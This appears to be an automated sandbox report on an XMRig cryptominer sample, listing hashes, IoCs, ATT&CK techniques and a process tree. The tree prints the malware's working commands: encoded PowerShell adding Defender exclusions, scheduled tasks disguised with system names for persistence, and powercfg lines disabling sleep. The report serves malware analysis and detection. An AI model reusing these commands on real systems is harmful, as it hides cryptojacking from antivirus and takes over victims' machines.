xmrig | 8591b86016fee0267755649d008dfb73d0d7ac44ff4bb27f94585477b2eb5924

Analysis

max time kernel
150s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
19/03/2023, 13:31

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

bgfbv.exe
Size

216KB
MD5

ca341777340c9f6a7ba878b3e37fcf9c
SHA1

07a04b16322d7b7ffb20d06da3f8b0b8d6758d3a
SHA256

8591b86016fee0267755649d008dfb73d0d7ac44ff4bb27f94585477b2eb5924
SHA512

461629756370df26e515b49467f18933d17f797a4c579b7ae67172c83b4951e654d3a4dffdb457121c95399c8c6a999e9d75343dcaa1efca0b40430ec5279e79
SSDEEP

3072:ess1fPMY0xyVpX5sLRRQRo0PnPdvAP2JyCiNZOQGWpOeXNzxc2NA1YSlajLgYBRH:efPVvX5G8nFmnvOZWB6MAkgLs

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral2/files/0x0006000000022fb4-322.dat	family_xmrig
behavioral2/files/0x0006000000022fb4-322.dat	xmrig
behavioral2/memory/4364-326-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/4364-327-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/4364-328-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/4364-329-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/4364-330-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/4364-332-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/4364-334-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AppLaunch.exe

Executes dropped EXE 2 IoCs

pid	Process
4428	dllhost.exe
4364	winlogson.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5048 set thread context of 4512	5048	bgfbv.exe	86

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4616	schtasks.exe
1268	schtasks.exe
4780	schtasks.exe
1464	schtasks.exe
2404	schtasks.exe
4364	schtasks.exe
4920	schtasks.exe
4992	schtasks.exe
3860	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4512	AppLaunch.exe
4552	powershell.exe
4552	powershell.exe
1452	powershell.exe
1452	powershell.exe
4560	powershell.exe
4560	powershell.exe
2160	powershell.exe
2160	powershell.exe
100	powershell.exe
100	powershell.exe
4088	powershell.exe
4088	powershell.exe
4560	powershell.exe
1452	powershell.exe
2160	powershell.exe
4088	powershell.exe
100	powershell.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe
4428	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
668	Process not Found

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	4512	AppLaunch.exe
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeShutdownPrivilege	2136	powercfg.exe
Token: SeCreatePagefilePrivilege	2136	powercfg.exe
Token: SeShutdownPrivilege	1320	powercfg.exe
Token: SeCreatePagefilePrivilege	1320	powercfg.exe
Token: SeDebugPrivilege	1452	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeShutdownPrivilege	3816	powercfg.exe
Token: SeCreatePagefilePrivilege	3816	powercfg.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	100	powershell.exe
Token: SeDebugPrivilege	4088	powershell.exe
Token: SeShutdownPrivilege	1468	powercfg.exe
Token: SeCreatePagefilePrivilege	1468	powercfg.exe
Token: SeShutdownPrivilege	2028	powercfg.exe
Token: SeCreatePagefilePrivilege	2028	powercfg.exe
Token: SeShutdownPrivilege	2028	powercfg.exe
Token: SeCreatePagefilePrivilege	2028	powercfg.exe
Token: SeDebugPrivilege	4428	dllhost.exe
Token: SeLockMemoryPrivilege	4364	winlogson.exe
Token: SeLockMemoryPrivilege	4364	winlogson.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4364	winlogson.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5048 wrote to memory of 4512	5048	bgfbv.exe	86
PID 5048 wrote to memory of 4512	5048	bgfbv.exe	86
PID 5048 wrote to memory of 4512	5048	bgfbv.exe	86
PID 5048 wrote to memory of 4512	5048	bgfbv.exe	86
PID 5048 wrote to memory of 4512	5048	bgfbv.exe	86
PID 4512 wrote to memory of 1564	4512	AppLaunch.exe	87
PID 4512 wrote to memory of 1564	4512	AppLaunch.exe	87
PID 4512 wrote to memory of 1564	4512	AppLaunch.exe	87
PID 1564 wrote to memory of 4552	1564	cmd.exe	89
PID 1564 wrote to memory of 4552	1564	cmd.exe	89
PID 1564 wrote to memory of 4552	1564	cmd.exe	89
PID 4512 wrote to memory of 4428	4512	AppLaunch.exe	96
PID 4512 wrote to memory of 4428	4512	AppLaunch.exe	96
PID 4512 wrote to memory of 4428	4512	AppLaunch.exe	96
PID 4512 wrote to memory of 4024	4512	AppLaunch.exe	97
PID 4512 wrote to memory of 4024	4512	AppLaunch.exe	97
PID 4512 wrote to memory of 4024	4512	AppLaunch.exe	97
PID 4512 wrote to memory of 2408	4512	AppLaunch.exe	107
PID 4512 wrote to memory of 2408	4512	AppLaunch.exe	107
PID 4512 wrote to memory of 2408	4512	AppLaunch.exe	107
PID 4512 wrote to memory of 4188	4512	AppLaunch.exe	106
PID 4512 wrote to memory of 4188	4512	AppLaunch.exe	106
PID 4512 wrote to memory of 4188	4512	AppLaunch.exe	106
PID 4512 wrote to memory of 4480	4512	AppLaunch.exe	105
PID 4512 wrote to memory of 4480	4512	AppLaunch.exe	105
PID 4512 wrote to memory of 4480	4512	AppLaunch.exe	105
PID 4512 wrote to memory of 4184	4512	AppLaunch.exe	104
PID 4512 wrote to memory of 4184	4512	AppLaunch.exe	104
PID 4512 wrote to memory of 4184	4512	AppLaunch.exe	104
PID 4512 wrote to memory of 1312	4512	AppLaunch.exe	103
PID 4512 wrote to memory of 1312	4512	AppLaunch.exe	103
PID 4512 wrote to memory of 1312	4512	AppLaunch.exe	103
PID 4512 wrote to memory of 3208	4512	AppLaunch.exe	102
PID 4512 wrote to memory of 3208	4512	AppLaunch.exe	102
PID 4512 wrote to memory of 3208	4512	AppLaunch.exe	102
PID 4512 wrote to memory of 2168	4512	AppLaunch.exe	101
PID 4512 wrote to memory of 2168	4512	AppLaunch.exe	101
PID 4512 wrote to memory of 2168	4512	AppLaunch.exe	101
PID 4512 wrote to memory of 636	4512	AppLaunch.exe	100
PID 4512 wrote to memory of 636	4512	AppLaunch.exe	100
PID 4512 wrote to memory of 636	4512	AppLaunch.exe	100
PID 4512 wrote to memory of 2784	4512	AppLaunch.exe	99
PID 4512 wrote to memory of 2784	4512	AppLaunch.exe	99
PID 4512 wrote to memory of 2784	4512	AppLaunch.exe	99
PID 4512 wrote to memory of 4912	4512	AppLaunch.exe	124
PID 4512 wrote to memory of 4912	4512	AppLaunch.exe	124
PID 4512 wrote to memory of 4912	4512	AppLaunch.exe	124
PID 4512 wrote to memory of 1228	4512	AppLaunch.exe	108
PID 4512 wrote to memory of 1228	4512	AppLaunch.exe	108
PID 4512 wrote to memory of 1228	4512	AppLaunch.exe	108
PID 4512 wrote to memory of 3104	4512	AppLaunch.exe	122
PID 4512 wrote to memory of 3104	4512	AppLaunch.exe	122
PID 4512 wrote to memory of 3104	4512	AppLaunch.exe	122
PID 4512 wrote to memory of 2016	4512	AppLaunch.exe	121
PID 4512 wrote to memory of 2016	4512	AppLaunch.exe	121
PID 4512 wrote to memory of 2016	4512	AppLaunch.exe	121
PID 2016 wrote to memory of 2136	2016	cmd.exe	125
PID 2016 wrote to memory of 2136	2016	cmd.exe	125
PID 2016 wrote to memory of 2136	2016	cmd.exe	125
PID 4024 wrote to memory of 1268	4024	cmd.exe	126
PID 4024 wrote to memory of 1268	4024	cmd.exe	126
PID 4024 wrote to memory of 1268	4024	cmd.exe	126
PID 2408 wrote to memory of 4364	2408	cmd.exe	133
PID 2408 wrote to memory of 4364	2408	cmd.exe	133

C:\Users\Admin\AppData\Local\Temp\bgfbv.exe
"C:\Users\Admin\AppData\Local\Temp\bgfbv.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5048
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
  2⤵
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4512
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAEYAeQBRACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQA0AG8AZAAwAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAMABrAGkATgBBADYANABaADQAbwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBzAEMAQwBHADQARwBzAEgAZwBHAHYAaQA4ACMAPgA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1564
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAEYAeQBRACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQA0AG8AZAAwAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAMABrAGkATgBBADYANABaADQAbwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBzAEMAQwBHADQARwBzAEgAZwBHAHYAaQA4ACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4552
- - C:\ProgramData\Dllhost\dllhost.exe
    "C:\ProgramData\Dllhost\dllhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4428
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:3172
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:3048
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:4364
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo ЙрtшLХCfуBРиж & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo бZ
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4024
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAEUEEAQVBE8APQREBCMEMABIAEUARwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjABIESgBqACgEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEsAHwRFBFAAKgQSBDMEHgQkBCMAPgAgAEAAKAAgADwAIwBIAD4EOARIAFQAQwB6AD4EIwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMARgA8BCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBXADIEOARkADEAIgQZBEUEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWABFAFAATgAjAD4A"
    3⤵
    PID:2784
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAEUEEAQVBE8APQREBCMEMABIAEUARwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjABIESgBqACgEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEsAHwRFBFAAKgQSBDMEHgQkBCMAPgAgAEAAKAAgADwAIwBIAD4EOARIAFQAQwB6AD4EIwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMARgA8BCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBXADIEOARkADEAIgQZBEUEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWABFAFAATgAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2160
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAFYAZgBXACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMwBTACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAcBEgARwAjBHAARQBmACYEOQQ4BDIEbwA1BCcETAQjAD4AIABAACgAIAA8ACMAKQRxADQEZQA2AFUAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjACoEOQQfBEgEHwQeBEEAPgQoBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBFAGgAcwBkACwESQBvAHIAMAQrBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAFQQwBHkAOwQjAD4A"
    3⤵
    PID:636
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAFYAZgBXACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMwBTACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAcBEgARwAjBHAARQBmACYEOQQ4BDIEbwA1BCcETAQjAD4AIABAACgAIAA8ACMAKQRxADQEZQA2AFUAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjACoEOQQfBEgEHwQeBEEAPgQoBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBFAGgAcwBkACwESQBvAHIAMAQrBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAFQQwBHkAOwQjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4560
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo еbAЪь5лXcчF & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ыоEЯEc0JюXSwVSСШЛs
    3⤵
    PID:2168
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4780
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo ЖmкяСе5зЪяьЛtsЯKмm & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЫgКИsо
    3⤵
    PID:3208
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4616
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo wЙMRЧНКпшvмйjмrwЛн & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 7j5Lж
    3⤵
    PID:1312
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4920
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo ZфЙFЙВ7Aйk & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo hOлкшшЫэKЗ5iLч
    3⤵
    PID:4184
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1464
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo мшъpМУ5ЙХщаXYпaн & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo nЩBйУУЩ
    3⤵
    PID:4480
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4992
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo 3вJbLяDЛAВчM & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo MJзк
    3⤵
    PID:4188
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2404
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo wЪиmC & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 4ЮтиHJh7hsfбQНI
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2408
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4364
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjACYEGgQXBGIAWAAeBCUEdQBnAG0AZABsAC0EKwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjACEETgQUBB8EOwQwBHcAbwBGBEsEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAFcANQRrACMAPgAgAEAAKAAgADwAIwBKABUEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAE4ESARiADYARQRiAEwAIAQcBBUEZAAeBGEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEYAOwQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5AHIASgB5AEoARQQ2BE4AWgAjAD4A"
    3⤵
    PID:1228
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjACYEGgQXBGIAWAAeBCUEdQBnAG0AZABsAC0EKwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjACEETgQUBB8EOwQwBHcAbwBGBEsEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAFcANQRrACMAPgAgAEAAKAAgADwAIwBKABUEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAE4ESARiADYARQRiAEwAIAQcBBUEZAAeBGEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEYAOwQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5AHIASgB5AEoARQQ2BE4AWgAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:100
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo м3рw & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo мЩpU0еtжЙдб
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2016
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2136
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1320
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3816
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1468
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /hibernate off
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2028
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3860
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAEYETABrAGEAKQQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEkAeABNAEQEOQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAHgRFBCYENAQjAD4AIABAACgAIAA8ACMAbAAwBEsEcQByACAESQQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAcwA5BD8ENQAiBFMAcwB1ACYEEwRKBB8EGgQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAPgRMBBcEIQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBlAGQAIwA+AA=="
    3⤵
    PID:3104
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAEYETABrAGEAKQQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEkAeABNAEQEOQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAHgRFBCYENAQjAD4AIABAACgAIAA8ACMAbAAwBEsEcQByACAESQQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAcwA5BD8ENQAiBFMAcwB1ACYEEwRKBB8EGgQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAPgRMBBcEIQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBlAGQAIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1452
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAFQATgQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEUAMgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAawA5BBUESAQsBFAAJwQ2BDsETQAdBCMAPgAgAEAAKAAgADwAIwBKBFoAeQBCBHAAJQQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMALQRsACcEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEYANwAnBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAJAQjAD4A"
    3⤵
    PID:4912
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAFQATgQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEUAMgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAawA5BBUESAQsBFAAJwQ2BDsETQAdBCMAPgAgAEAAKAAgADwAIwBKBFoAeQBCBHAAJQQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMALQRsACcEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEYANwAnBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAJAQjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4088

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\HostData\config.json

Filesize
319B

MD5
a255f408bc0a2edbd88f9425f7f6ce5b

SHA1
352f7b9f0f99b3037b88e6c7bf8e9925edbca96e

SHA256
53de4fd5e2ca23d0481c6c14387d720d5ac8581f94b00a0b18cfa45d72bcdf93

SHA512
